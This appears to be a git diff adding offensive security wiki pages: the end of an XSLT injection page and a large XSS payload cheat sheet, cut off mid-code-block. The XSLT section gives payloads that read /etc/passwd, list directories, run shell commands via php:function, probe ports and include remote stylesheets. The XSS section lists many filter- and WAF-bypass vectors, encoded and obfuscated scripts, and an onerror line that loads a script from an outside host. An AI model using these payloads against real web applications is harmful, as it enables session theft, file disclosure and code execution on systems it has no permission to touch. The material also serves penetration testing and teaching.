+ Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
+ </xsl:if>
+ <xsl:if test="system-property('xsl:is-schema-aware')">
+ Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
+ </xsl:if>
+ <xsl:if test="system-property('xsl:supports-serialization')">
+ Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
+/><br />
+ </xsl:if>
+ <xsl:if test="system-property('xsl:supports-backwards-compatibility')">
+ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
+/><br />
+ </xsl:if>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+## Javascript Injection
+
+```text
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+<script>confirm("We're good");</script>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+## Directory listing \(PHP\)
+
+### **Opendir + readdir**
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
+<xsl:template match="/">
+<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+<xsl:value-of select="php:function('readdir')"/> -
+</xsl:template></xsl:stylesheet>
+```
+
+### **Assert \(var\_dump + scandir + false\)**
+
+```text
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+    <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+        <xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
+        <br />
+    </body>
+</html>
+```
+
+## Read files
+
+### **Internal**
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+&ext_file;
+</xsl:template>
+</xsl:stylesheet>
+```
+
+### **Through HTTP**
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+<xsl:value-of select="document('/etc/passwd')"/>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+```text
+<!DOCTYPE xsl:stylesheet [
+<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
+<xsl:template match="/">
+&passwd;
+</xsl:template>
+```
+
+### **Internal \(PHP\)**
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
+<xsl:template match="/">
+<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+```text
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+    <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+        <xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
+        <br />
+    </body>
+</html>
+```
+
+### Port scan
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
+<xsl:template match="/">
+<xsl:value-of select="document('http://example.com:22')"/>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+## Write to a file
+
+### XSLT 2.0
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
+<xsl:template match="/">
+<xsl:result-document href="local_file.txt">
+<xsl:text>Write Local File</xsl:text>
+</xsl:result-document>
+</xsl:template>
+</xsl:stylesheet>
+```
+
+### **Xalan-J extension**
+
+```text
+<xsl:template match="/">
+<redirect:open file="local_file.txt"/>
+<redirect:write file="local_file.txt"/> Write Local File</redirect:write>
+<redirect:close file="loxal_file.txt"/>
+</xsl:template>
+```
+
+Other ways to write files in the PDF
+
+## Include external XSL
+
+```text
+<xsl:include href="http://extenal.web/external.xsl"/>
+```
+
+```text
+<?xml version="1.0" ?>
+<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
+```
+
+## Execute code
+
+### **php:function**
+
+```text
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0"
+xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:php="http://php.net/xsl" >
+<xsl:template match="/">
+<xsl:value-of select="php:function('shell_exec','sleep 10')" />
+</xsl:template>
+</xsl:stylesheet>
+```
+
+```text
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
+<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
+<br />
+</body>
+</html>
+```
+
+Execute code using other frameworks in the PDF
+
+### **References**
+
+[XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)  
+[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)  
+[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
+
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
new file mode 100644
index 00000000..2d70bee0
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -0,0 +1,844 @@
+# XSS \(Cross Site Scripting\)
+
+## Methodology
+
+1. Check if **any value you control** \(_parameters_, _path_, _headers_?, _cookies_?\) is being **reflected** in the HTML or **used** by **JS** code.
+2. **Find the context** where it's reflected/used.
+3. If **reflected**
+   1. Check **which symbols can you use** and depending on that, prepare the payload:
+      1. In **raw HTML**: 
+         1. Can you create new HTML tags?
+         2. Can you use events or attributes supporting `javascript:` protocol?
+         3. Can you create your own HTML tags?
+         4.  Can you bypass protections?
+         5. Is the HTML content being interpreted by any client side JS engine \(_AngularJS_, _VueJS_, _Mavo_...\), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
+         6. If you cannot create HTML tags that execute JS code,could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md).
+      2. Inside a **HTML tag**:
+         1. Can you exit to raw HTML context?
+         2. Can you create new events/attributes to execute JS code?
+         3. Does the attribute where you are trapped support JS execution?
+         4. Can you bypass protections?
+      3. Inside **JavaScript code**:
+         1. Can you escape the `<script>` tag?
+         2. Can you escape the string and execute different JS code?
+         3. Are your input in template literals ````````?
+         4. Can you bypass protections?
+4. If **used**:
+   1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
+
+## Reflected values
+
+In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
+
+* **Intermediately reflected**: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a **Reflected XSS**.
+* **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
+* **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
+
+## Contexts
+
+When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
+
+### Raw HTML
+
+If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: `<img , <iframe , <svg , <script` ... these are just some of the many possible HTML tags you could use.  
+Also, keep in mind [Client Side Template Injection](../client-side-template-injection-csti.md).
+
+### Inside HTML tags attribute
+
+If your input is reflected inside the value of the attribute of a tag you could try:
+
+1. To **escape from the attribute and from the tag** \(then you will be in the raw HTML\) and create new HTML tag to abuse: `"><img [...]`
+2. If you **can escape from the attribute but not from the tag** \(`>` is encoded or deleted\), depending on the tag you could **create an event** that executes JS code: `" autofocus onfocus=alert(1) x="`
+3. If you **cannot escape from the attribute** \(`"` is being encoded or deleted\), then depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked. Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
+4. If your input is reflected inside "**unexpoitable tags**" you could try the **`accesskey`** trick to abuse the vuln \(you will need some kind of social engineer to exploit this\): **`" accesskey="x" onclick="alert(1)" x="`**
+
+### Inside JavaScript code
+
+In this case your input is reflected between **`<script> [...] </script>`** tags of a HTML page, inside a **`.js`**file or inside an attribute using **`javascript:`** protocol:
+
+* If reflected between **`<script> [...] </script>`** tags, even if your input if inside any kind of quotes, you can try to inject `</script>` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `</script>` tag is inside the HTML code.
+* If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code \(if there is any error, it won't be executed:
+  * `'-alert(1)-'`
+  * `';-alert(1)//`
+  * `\';alert(1)//`
+* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: ``var greetings = `Hello, ${alert(1)}```
+
+### DOM
+
+There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
+
+## WAF bypass encoding image
+
+![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
+
+## Injecting inside raw HTML
+
+When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.  
+For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**  
+_**Note: A HTML comment can be closed using `-->` or `--!>`**_
+
+In this case and if no black/whitelisting is used, you could use payloads like:
+
+```javascript
+<script>alert(1)</script>
+<img src=x onerror=alert(1) />
+<svg onload=alert('XSS')>
+```
+
+But, if tags/attributes black/whitelisting is being used, you will need to **brute-force which tags** you can create.  
+Once you have **located which tags are allowed**, you would need to **brute-force attributes/events** inside the found valid tags to see how you can attack the context.
+
+### Tags/Events brute-force
+
+Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags \(in the same web page click on _**Copy events to clipboard**_  and follow the same procedure as before\).
+
+### Custom tags
+
+If you didn't find any valid HTML tag, you could try to **create a custom tag** and and execute JS code with the `onfocus` attribute. In the XSS request, you need to end the URL with `#` to make the page **focus on that object** and **execute** the code:
+
+```text
+/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
+```
+
+### Blacklist Bypasses
+
+If some kind of blacklist is being used you could try to bypass it with some silly tricks:
+
+```javascript
+//Random capitalization
+<script> --> <ScrIpT>
+<img --> <ImG
+//Double tag, in case just the first match is removed
+<script><script>
+//Double tag inside, in case just checked once
+<SCRscriptIPT>alert(1)</SCRscriptIPT>
+//You can substitude the space to separate attributes for:
+/
+/*%00/
+/%00*/
+%2F
+%0D
+%0C
+%0A
+%09
+//Unexpected parent tags
+<svg><x><script>alert('1'&#41</x>
+//Unexpected weird attributes
+<script x>
+<script a="1234">
+<script ~~~>
+//Not closing tag, ending with " <" or " //"
+<iframe SRC="javascript:alert('XSS');" <
+<iframe SRC="javascript:alert('XSS');" //
+//Extra open
+<<script>alert("XSS");//<</script>
+//Just weird an unexpected, use your imagination
+<</script/script><script>
+<input type=image src onerror="prompt(1)">
+//Using `` instead of parenthesis
+onerro=alert`1`
+//Use more than one
+<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
+```
+
+### Length bypass \(XSS in 20chars\)
+
+Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html).
+
+```javascript
+<svg/onload=alert``>
+<script src=//aa.es>
+<script src=//℡㏛.pw>
+```
+
+The last one is using 2 unicode characters which expands to 5: telsr  
+More of these characters can be found [here](https://www.unicode.org/charts/normalization/).  
+To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
+
+### Weird combinations
+
+From [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
+
+```markup
+<svg><animate onbegin=alert() attributeName=x></svg>
+<object data="data:text/html,<script>alert(5)</script>">
+<iframe srcdoc="<svg onload=alert(4);>">
+<object data=javascript:alert(3)>
+<iframe src=javascript:alert(2)>
+<embed src=javascript:alert(1)>
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
+<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
+```
+
+### Click XSS - Clickjacking
+
+If in order to exploit the vulnerability you need the **user to click a link or a form** with prepopulated data you could try to [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) \(if the page is vulnerable\).
+
+### Impossible - Dangling Markup
+
+If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code.
+
+## Injecting inside HTML tag
+
+### Inside the tag/escaping from attribute value
+
+If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.  
+If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like \(_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_\):
+
+```javascript
+" autofocus onfocus=alert(document.domain) x="
+```
+
+### Within the attribute
+
+Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.   
+Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
+
+#### **Bypass inside event using HTML encoding/URL encode**
+
+The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid \(the payload is in bold\): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
+
+Note that **any kind of HTML encode is valid**:
+
+```javascript
+//HTML entities
+&apos;-alert(1)-&apos;
+//HTML hex without zeros
+&#x27-alert(1)-&#x27
+//HTML hex with zeros
+&#x00027-alert(1)-&#x00027
+//HTML dec without zeros
+&#39-alert(1)-&#39
+//HTML dec with zeros
+&#00039-alert(1)-&#00039
+
+<a href="javascript:var a='&apos;-alert(1)-&apos;'">
+```
+
+**Note that URL encode will also work:**
+
+```python
+<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
+```
+
+#### Bypass inside event using Unicode encode
+
+```javascript
+//For some reason you can use unicode to encode "alert" but not "(1)"
+<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
+<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
+```
+
+#### Bypass inside `javascript:`using HTML and URL encoding
+
+Your input could also by **reflected** in HTML tags that accept the protocol **`javascript:`** like `<a href="javascript:fetch('/<your_input>'">` in these cases you can still **alter** the **JS flow** to execute arbitrary code.  
+_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_  
+Moreover, there is another **nice trick** for these cases**: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time.  
+_Note the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** \(but not `<img`\)_
+
+```javascript
+&apos;-alert(1)-&apos;
+%27-alert(1)-%27
+<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
+```
+
+Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**.
+
+#### Using Hex and Octal encode with `javascript:`
+
+You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` \(at least\) to declare **HTML tags to execute JS**:
+
+```javascript
+//Encoded: <svg onload=alert(1)>
+// This WORKS
+<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
+<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
+
+//Encoded: alert(1)
+// This doesn't work
+<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
+<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
+```
+
+#### Using data encoding
+
+```javascript
+<object data="data:text/html,<script>alert(1)</script>"></object>
+<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
+<object data="data:text/html;charset=UTF-8,<script>alert(1)</script>"></object>
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
+<object data="data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"></object>
+```
+
+### XSS in "Unexploitable tags" \(input hidden, link, canonical\)
+
+From [here](https://portswigger.net/research/xss-in-hidden-input-fields):  
+You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
+
+```markup
+<input type="hidden" accesskey="X" onclick="alert(1)">
+```
+
+T**he XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`**
+
+### Blacklist Bypasses
+
+Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding**.
+
+#### Bypasses for HTML tags and attributes
+
+Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses).
+
+#### Bypasses for JavaScript code
+
+Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques).
+
+## Injecting inside JavaScript code
+
+In these case you **input** is going to be **reflected inside the JS code** of a `.js` file or between `<script>...</script>` tags or between HTML events that can execute JS code or between attributes that accepts the `javascript:` protocol.
+
+### Escaping &lt;script&gt; tag
+
+If your code is inserted within `<script> [...] var input = 'reflected data' [...] </script>` you could easily **escape closing the `<script>`** tag:
+
+```javascript
+</script><img src=1 onerror=alert(document.domain)>
+```
+
+Note that in this example we **haven't even closed the single quote**, but that's not necessary as the **browser first performs HTML parsing** to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts.
+
+### Inside JS code
+
+If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. It's important to **fix JS syntax**, because if there are any errors, the JS code won't be executed:
+
+```text
+'-alert(document.domain)-'
+';alert(document.domain)//
+\';alert(document.domain)//
+```
+
+### Template literals \`\`
+
+In order to construct **strings** apart from single and double quotes JS also accepts **backticks** ```````` . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.  
+Therefore, if you find that your **input** is being **reflected inside** a JS string that is using **backticks**, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
+
+``var greetings = `Hello, <your input>```
+
+This can be **abused** using: `${alert(1)}`
+
+### JavaScript bypass blacklists techniques
+
+#### Strings
+
+```javascript
+"thisisastring"
+'thisisastrig'
+`thisisastring`
+/thisisastring/ == "/thisisastring/"
+/thisisastring/.source == "thisisastring"
+String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
+"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
+"\164\150\151\163\151\163\141\163\164\162\151\156\147"
+"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
+"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
+atob("dGhpc2lzYXN0cmluZw==")
+```
+
+#### Space substitutions inside JS code
+
+```javascript
+<TAB>
+/**/
+```
+
+#### [JavaScript without parentheses](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
+
+#### JavaScript comments \(from [JavaScript Comments](./#javascript-comments) trick\)
+
+```javascript
+//This is a 1 line comment
+/* This is a multiline comment*/
+#!This is a 1 line comment, but "#!" must to be at the beggining of the line
+-->This is a 1 line comment, but "-->" must to be at the beggining of the line
+```
+
+#### JavaScript new lines \(from [JavaScript new line](./#javascript-new-lines) trick\)
+
+```javascript
+//Javascript interpret as new line these chars:
+String.fromCharCode(10) //0x0a
+String.fromCharCode(13) //0x0d
+String.fromCharCode(8232) //0xe2 0x80 0xa8
+String.fromCharCode(8233) //0xe2 0x80 0xa8
+```
+
+#### Arbitrary function \(alert\) call
+
+```javascript
+`` //Can be use as parenthesis
+alert`document.cookie`
+alert(document['cookie']) 
+with(document)alert(cookie) 
+eval('ale'+'rt(1)')
+(alert)(1)
+(alert(1))in"."
+a=alert,a(1)
+[1].find(alert)
+window['alert'](0)
+parent['alert'](1)
+self['alert'](2)
+top['alert'](3)
+this['alert'](4)
+frames['alert'](5)
+content['alert'](6)
+[7].map(alert)
+[8].find(alert)
+[9].every(alert)
+[10].filter(alert)
+[11].findIndex(alert)
+[12].forEach(alert);
+top[/al/.source+/ert/.source](1)
+top[8680439..toString(30)](1)
+Function("ale"+"rt(1)")();
+new Function`al\ert\`6\``;
+setTimeout('ale'+'rt(2)');
+setInterval('ale'+'rt(10)');
+Set.constructor('ale'+'rt(13)')();
+Set.constructor`al\x65rt\x2814\x29```;
+$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
+x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
+this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
+```
+
+## **DOM vulnerabilities**
+
+There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.  
+**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**.**  
+There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.  
+Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
+
+## Other Bypasses
+
+### Normalised Unicode
+
+You could check is the **reflected values** are being **unicode normalized** in the server \(or in the client side\) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-normalization-vulnerability.md#xss-cross-site-scripting).
+
+### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
+
+```javascript
+"><svg/onload=confirm(1)>"@x.y
+```
+
+### Ruby-On-Rails bypass
+
+Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields \(onfocus\) can be added inside the tag.  
+Form example \([from this report](https://hackerone.com/reports/709336)\), if you send the payload:
+
+```text
+contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
+```
+
+The pair "Key","Value" will be echoed back like this:
+
+```text
+{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
+```
+
+Then, the onfocus attribute will be inserted:
+
+![](../../.gitbook/assets/image%20%2882%29.png)
+
+A XSS occurs.
+
+### Special combinations
+
+```markup
+<iframe/src="data:text/html,<svg onload=alert(1)>">
+<input type=image src onerror="prompt(1)">
+<svg onload=alert(1)//
+<img src="/" =_=" title="onerror='prompt(1)'">
+<img src='1' onerror='alert(0)' <
+<script x> alert(1) </script 1=2
+<script x>alert('XSS')<script y>
+<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
+<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
+<script>$=1,alert($)</script>
+<script ~~~>confirm(1)</script ~~~>
+<script>$=1,\u0061lert($)</script>
+<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
+<</script/script><script ~~~>\u0061lert(1)</script ~~~>
+</style></scRipt><scRipt>alert(1)</scRipt>
+<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
+<svg><x><script>alert('1'&#41</x>
+<iframe src=""/srcdoc='<svg onload=alert(1)>'>
+<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
+<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
+```
+
+### Obfuscation & Advanced Bypass
+
+* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
+* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs) 
+* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com/) 
+* [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/) 
+* [http://www.jsfuck.com/](http://www.jsfuck.com/)
+* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
+* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
+
+```javascript
+<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
+```
+
+```javascript
+//JJencode
+<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
+```
+
+```javascript
+//JSFuck
